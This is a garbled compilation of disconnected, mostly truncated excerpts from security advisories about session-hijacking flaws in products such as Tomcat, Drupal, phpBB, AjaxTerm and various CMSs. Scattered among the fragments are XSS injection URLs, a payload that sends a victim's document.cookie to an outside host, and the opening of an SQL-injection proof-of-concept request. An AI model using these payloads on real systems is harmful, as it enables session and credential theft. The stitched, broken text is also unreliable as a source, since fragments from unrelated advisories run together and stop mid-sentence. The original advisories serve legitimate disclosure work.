session hijacking
When handling the 'update' action, 'default_comment_display' is the only parameter that isn't sanitized with
mysql_real_escape_string(); this can be exploited to inject arbitrary SQL code. Because this is a multi-line
query, and the latest version of MySQL doesn't allow a comment to be started with /* unless it is followed by a */,
it is sometimes impossible to alter the 'users' table content (e.g. to change the admin's password), but it is still
possible to inject a subquery to fetch, for example, the admin's session id for a session hijacking attack.
This is a proof of concept request:
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
SecureWorks Security Advisory SWRX-2009-002
McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability
Advisory Information
Title: McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability
Advisory ID: SWRX-2009-002
==========================================
2Wire Broadband Router Session Hijacking Vulnerability
==========================================
1. OVERVIEW
The 2Wire Broadband Router is vulnerable to a session hijacking flaw
through which attackers can compromise the router administrator's session.
* System affected => [ 'Apache Axis <= 1.5' ]
* Release date: => [ '24 June 2010' ]
* Impact => [ 'Successful exploitation of this vulnerability may
allow the remote administrative interface to accept a hijacked session' ]
Axis2 [1] claims to be a Web Services / SOAP / WSDL engine, the
successor to the widely used Apache Axis SOAP stack. Nowadays, there are
two implementations of the Apache Axis2 Web services engine - Apache
Synopsis
========
Multiple vulnerabilities in Tomcat may lead to local file overwriting,
session hijacking or information disclosure.
Background
==========
Tomcat is the Apache Jakarta Project's official implementation of Java
Product link: http://www.orangehrm.com/
2. Vulnerability Information
Class: Cross site scripting, SQL injection, PHP code injection, Cross-site
request forgery
Impact: Session hijacking, unauthorized data access, privilege escalation,
user-assisted arbitrary command execution
Rating: Less critical
Remotely Exploitable: Yes
Locally Exploitable: No
2. Profile information (user, email, Real Name) is not filtered. For example, a user could use something like "<script>alert(document.cookie)</script> " as a Real Name and the script would execute every time someone views that user's profile or the members page.
However, the number of characters allowed in Real Name is limited, so it's unlikely too much damage could be done.
If XSS is allowed, it could allow for Session Hijacking.
I found this bug using version 6.1 of NSSboard (the latest as of this writing), and it's likely that all earlier versions are also affected, but I didn't test them. I am using Debian Linux and lighttpd to host it.
The fix would be to make sure HTML tags are filtered regardless of BBcode being enabled, and to filter user profile input data.
http://www-01.ibm.com/software/data/cognos/products/cognos-8-business-intelligence/capabilities.html
2. Vulnerability Information
Class: Cross site scripting
Impact: Session hijacking
Rating: Less critical
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: N/A
2. http://www.website.tld/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>
Explained: The above has greater impact as it will survive a login. This is not filtered either. This works only when one is logged in.
Additional Information:
If $config_session_regenerate = false; in config.inc.php is set to 'true', then the session ids will be regenerated on each hit/click, preventing session hijacking.
-:: Solution ::-
The easiest solution is to validate user input and strip or convert bad / HTML characters. Setting the above to true might solve the issue partially; however, session hijacking is only one of the things you can do with cross site scripting.
Changelog: 2008/08/29
Summary: Introduction
Blind SQL Injection
Insecure SQL Password Usage
Admin Session Hijacking
Deep Recursion Protection Bypass
Code Execution
Miscellaneous
Risk level: Medium / High
Manager web applications allow remote authenticated users to inject
arbitrary web script or HTML (CVE-2007-2450).
Tomcat treated single quotes as delimiters in cookies, which could
cause sensitive information such as session IDs to be leaked and allow
remote attackers to conduct session hijacking attacks (CVE-2007-3382).
Tomcat did not properly handle the " character sequence in a cookie
value, which could cause sensitive information such as session IDs
to be leaked and allow remote attackers to conduct session hijacking
attacks (CVE-2007-3385).
The vulnerability allows a local low-privileged user account to
inject malicious persistent script code on the application
side.
Successful exploitation of the vulnerability can result in session
hijacking or content request manipulation.
Vulnerable Module(s): (Persistent)
[+] Userdata Form allows
[+] Group Administration & Track ID
[+] User Password CSRF + Reset
Security Risk
=============
It is possible to manipulate administrator interface cookies, which may be used to impersonate a legitimate user, allowing the attacker to view or alter user records, and to perform transactions as that user.
The Cookie variable can be set to a malicious and arbitrary value, which can lead to session hijacking and privilege escalation attacks.
Possible Causes
===============
Insecure web application programming or configuration
Introduction:
=============
The SonicWall NSA 4500 web admin interface offers the option of customizing some web pages directly from the admin interface. For this, the web interface has some forms where the admin can put the code and test it via a preview feature. This preview feature will show the page and execute all the JavaScript code inside it in the web admin security context, which leads to many traditional attacks, like XSS, session hijacking...
Report-Timeline:
================
Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0
through 4.1.36 does not properly handle (1) double quote (") characters
or (2) \%5C (encoded backslash) sequences in a cookie value, which
might cause sensitive information such as session IDs to be leaked
to remote attackers and enable session hijacking attacks. NOTE:
this issue exists because of an incomplete fix for CVE-2007-3385
(CVE-2007-5333).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through
6.0.18, and possibly earlier versions normalizes the target pathname
========
1.1
Multiple persistent input validation vulnerabilities have been detected in the well-known Content Papst v2011.2 Content Management System.
The vulnerability allows a remote attacker or a local low-privileged CP user account to inject their own malicious script code on the
application side (persistent) of the web service. Successful exploitation of the vulnerability can result in persistent module
content manipulation of vulnerable modules, phishing and session hijacking.
Vulnerable Module(s):
[+] Category => Title/Description/Permalink
[+] Links => Title/URL/Description
[+] Article Category => Title/Description/Permalink
Advisory Title: Lotus Notes Memory Mapped Files Vulnerability
Author: Ollie Whitehouse / ollie_whitehouse@symantec.com
Release Date: 23-10-2007
Application: Lotus Notes / Domino
Platform: Microsoft Windows
Severity: Session hijacking in shared user environments
/ Data leakage in shared user environments
Vendor status: Updated Application Versions Available
CVE Number: CVE-2007-5544
Reference: http://www.securityfocus.com/bid/26146
drupal: Session hijacking vulnerability, CVE-2008-3661
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3661
http://int21.de/cve/CVE-2008-3661-drupal.html
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
Description
menalto gallery: Session hijacking vulnerability, CVE-2008-3102
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3102
http://int21.de/cve/CVE-2008-3102-mantis.html
http://www.mantisbt.org/bugs/view.php?id=9524
http://www.mantisbt.org/bugs/view.php?id=9533
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
The vulnerability exists due to the “/gwtTeaming.rpc” code not properly sanitizing user input into the “What Are You Working On?” or Micro Blog entry field. Also, the application fails to encode the output allowing for the execution of the script.
Tested on: Cent OS 5.5 (kernel 2.6.18-194), MySQL Version 14.12 Distribution 5.0.77, and Novell Vibe 3 BETA OnPrem.
Affected software versions: Vibe 3 BETA OnPrem
Impact: Any user who can view another user’s Micro Blog entry is vulnerable to this XSS attack. Successful exploitation of this vulnerability could result in session cookie theft, session hijacking, URL redirection, and possible operating system code execution on the targeted victim’s host.
Fixed in: Fixed in the final shipping version of Novell Vibe OnPrem 3
Remediation guidelines: Update to the final shipping version of Novell Vibe OnPrem 3
#2009-004 AjaxTerm session id collision
Description:
AjaxTerm, an open source web based terminal, uses a form of random session id
generation which can lead to remote session hijacking.
The ajaxterm.js script allocates session ids on the client side using the
following method:
var sid=""+Math.round(Math.random()*1000000000);
Alert box injection -
http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script>
Cookie theft (could be used in session hijacking attacks) -
http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://procheckup.com/?"%2bdocument.cookie</script>
or partially obfuscated -
(/surgemail) allows remote attackers to inject arbitrary web script or HTML.
Input passed to the "username_ex" parameter is not properly sanitised before
being returned to the user, therefore enabling the execution of arbitrary
script code in a user's browser session, which can lead to cookie theft and
session hijacking.
The vulnerability is confirmed to exist in version 4.3e (latest version at
the date of vulnerability discovery). Previous versions may also be vulnerable.
Exploit
Synopsis
========
Multiple vulnerabilities have been found in Asterisk allowing for SQL
injection, session hijacking and unauthorized usage.
Background
==========
Asterisk is an open source telephony engine and tool kit.
Squirrelmail: Session hijacking vulnerability, CVE-2008-3663
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3663
http://int21.de/cve/CVE-2008-3663-squirrelmail.html
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
Description
Brief Description: Collaboration relies on distributed systems that
provide the required security properties. Virtual organizations often
use the Internet to support collaboration. The Internet, operating
systems and distributed environments currently suffer from poor
security support and cannot resist common attacks (spamming, worms,
session hijacking, buffer overflow, denial of service, social
engineering, etc.). Collaborative organizations require better
security properties (strong authentication, efficient encryption,
Mandatory Access Control, integrity, non-repudiation and
availability). Nowadays, collaborative organizations use new
technologies such as mobile devices, smartcards, wireless networks,
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
phpBB 2.0.23 Session Hijacking Vulnerability +
found by NBBN 13 Mar 2008 +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
::Information about this vulnerability
If a moderator or an admin closes a thread in phpBB 2.0.X, the session id
is sent via GET:
Joomla: Session hijacking vulnerability, CVE-2008-4122
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122
http://int21.de/cve/CVE-2008-4122-joomla.html
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
Description
archive, applet, or Java Web Start application, possibly resulting in
the execution of arbitrary code with the privileges of the user running
the application. Furthermore, a remote attacker could cause a Denial of
Service affecting multiple services via several vectors, disclose
information and memory contents, write or execute local files, conduct
session hijacking attacks via GIFAR files, steal cookies, bypass the
same-origin policy, load untrusted JAR files, establish network
connections to arbitrary hosts and ports via several vectors, modify
the list of supported graphics configurations, bypass HMAC-based
authentication systems, escalate privileges via several vectors and
cause applet code to be executed with older, possibly vulnerable